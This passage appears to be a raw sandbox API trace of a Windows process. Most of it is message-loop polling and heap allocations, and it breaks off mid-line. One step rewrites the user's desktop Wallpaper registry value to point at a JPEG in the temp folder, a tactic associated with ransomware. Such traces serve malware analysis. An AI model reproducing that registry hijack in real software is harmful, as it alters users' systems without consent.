(in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0257.961] Sleep (dwMilliseconds=0xa) [0258.047] timeGetTime () returned 0x1180558 [0258.047] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0258.047] Sleep (dwMilliseconds=0xa) [0258.083] timeGetTime () returned 0x1180587 [0258.083] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0258.083] Sleep (dwMilliseconds=0xa) [0258.145] timeGetTime () returned 0x11805c5 [0258.145] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0258.145] Sleep (dwMilliseconds=0xa) [0258.192] timeGetTime () returned 0x11805f4 [0258.192] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0258.192] Sleep (dwMilliseconds=0xa) [0258.238] timeGetTime () returned 0x1180623 [0258.238] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0258.238] Sleep (dwMilliseconds=0xa) [0258.270] timeGetTime () returned 0x1180643 [0258.270] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0258.270] Sleep (dwMilliseconds=0xa) [0258.316] timeGetTime () returned 0x1180671 [0258.316] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0258.316] Sleep (dwMilliseconds=0xa) [0258.363] timeGetTime () returned 0x11806a0 [0258.363] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0258.363] Sleep (dwMilliseconds=0xa) [0258.412] timeGetTime () returned 0x11806cf [0258.412] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0258.412] TranslateMessage (lpMsg=0x8cf798) returned 0 [0258.412] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0258.413] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0258.413] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0258.413] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0258.413] Sleep (dwMilliseconds=0xa) [0258.532] timeGetTime () returned 0x118073c [0258.532] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0258.532] Sleep (dwMilliseconds=0xa) [0258.555] timeGetTime () returned 0x118075c [0258.555] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0258.555] Sleep (dwMilliseconds=0xa) [0258.598] timeGetTime () returned 0x118078a [0258.598] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0258.598] Sleep (dwMilliseconds=0xa) [0258.645] timeGetTime () returned 0x11807b9 [0258.645] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0258.645] Sleep (dwMilliseconds=0xa) [0258.692] timeGetTime () returned 0x11807db [0258.692] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0258.692] Sleep (dwMilliseconds=0xa) [0258.725] timeGetTime () returned 0x118080a [0258.725] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0258.725] Sleep (dwMilliseconds=0xa) [0258.772] timeGetTime () returned 0x1180839 [0258.772] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0258.772] Sleep (dwMilliseconds=0xa) [0258.818] timeGetTime () returned 0x1180867 [0258.818] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0258.819] Sleep (dwMilliseconds=0xa) [0258.866] timeGetTime () returned 0x1180896 [0258.866] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0258.866] Sleep (dwMilliseconds=0xa) [0258.912] timeGetTime () returned 0x11808c5 [0258.913] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0258.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0258.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0258.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0258.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0258.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0258.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0258.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0258.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0258.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0258.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0258.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0258.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0258.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0258.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0258.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0258.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0258.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0258.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0258.915] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0258.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0258.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0258.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab488 [0258.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0258.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0258.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab530 [0258.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0258.915] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf438 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0258.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0258.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eb268 [0258.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0258.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0258.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0258.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0258.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0258.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0258.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0258.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0258.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0258.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0258.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0258.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0258.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f40 [0258.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0258.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xb0) returned 0x29f7878 [0258.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eb268 | out: hHeap=0x2af0000) returned 1 [0258.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0258.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0258.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0258.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0258.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0258.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0258.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0258.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0258.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0258.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0258.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0258.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0258.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0258.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2a731b0 [0258.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0258.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0258.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0258.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0258.917] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0258.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0258.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0258.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0258.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0258.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0258.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0258.917] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x3c0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0258.917] RegSetValueExW (in: hKey=0x3c0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0258.918] RegCloseKey (hKey=0x3c0) returned 0x0 [0258.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a731b0 | out: hHeap=0x2af0000) returned 1 [0258.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0258.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0258.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0258.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0258.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0258.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0258.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0258.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0258.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0258.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0258.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0258.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0258.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0258.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0258.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0258.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0258.918] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0258.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0258.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0258.918] CharUpperBuffW (in: lpsz="A0F00F04C39", cchLength=0xb | out: lpsz="A0F00F04C39") returned 0xb [0258.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0258.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0258.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0258.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72238 [0258.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0258.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0258.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0258.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0258.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72338 [0258.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0258.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0258.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0258.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0258.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0258.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0258.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0258.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0258.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0258.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0258.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0258.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab6e0 [0258.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0258.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0258.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0258.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0258.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0258.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0258.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0258.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0258.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0258.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0258.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0258.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0258.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0258.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab590 [0258.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab500 [0258.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0258.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0258.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0258.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0258.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0258.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0258.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0258.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0258.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0258.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0258.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0258.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0258.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab710 [0258.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4d0 [0258.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0258.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0258.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0258.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0258.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0258.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0258.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0258.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0258.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0258.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0258.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0258.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0258.921] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0258.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0258.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0258.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0258.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0258.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0258.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0258.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0258.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0258.921] CharUpperBuffW (in: lpsz="SSA0F00F04C39", cchLength=0xd | out: lpsz="SSA0F00F04C39") returned 0xd [0258.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0258.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0258.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0258.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0258.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0258.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0258.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0258.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0258.921] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0258.922] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0258.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0258.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0258.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0258.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0258.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0258.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0258.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0258.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0258.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 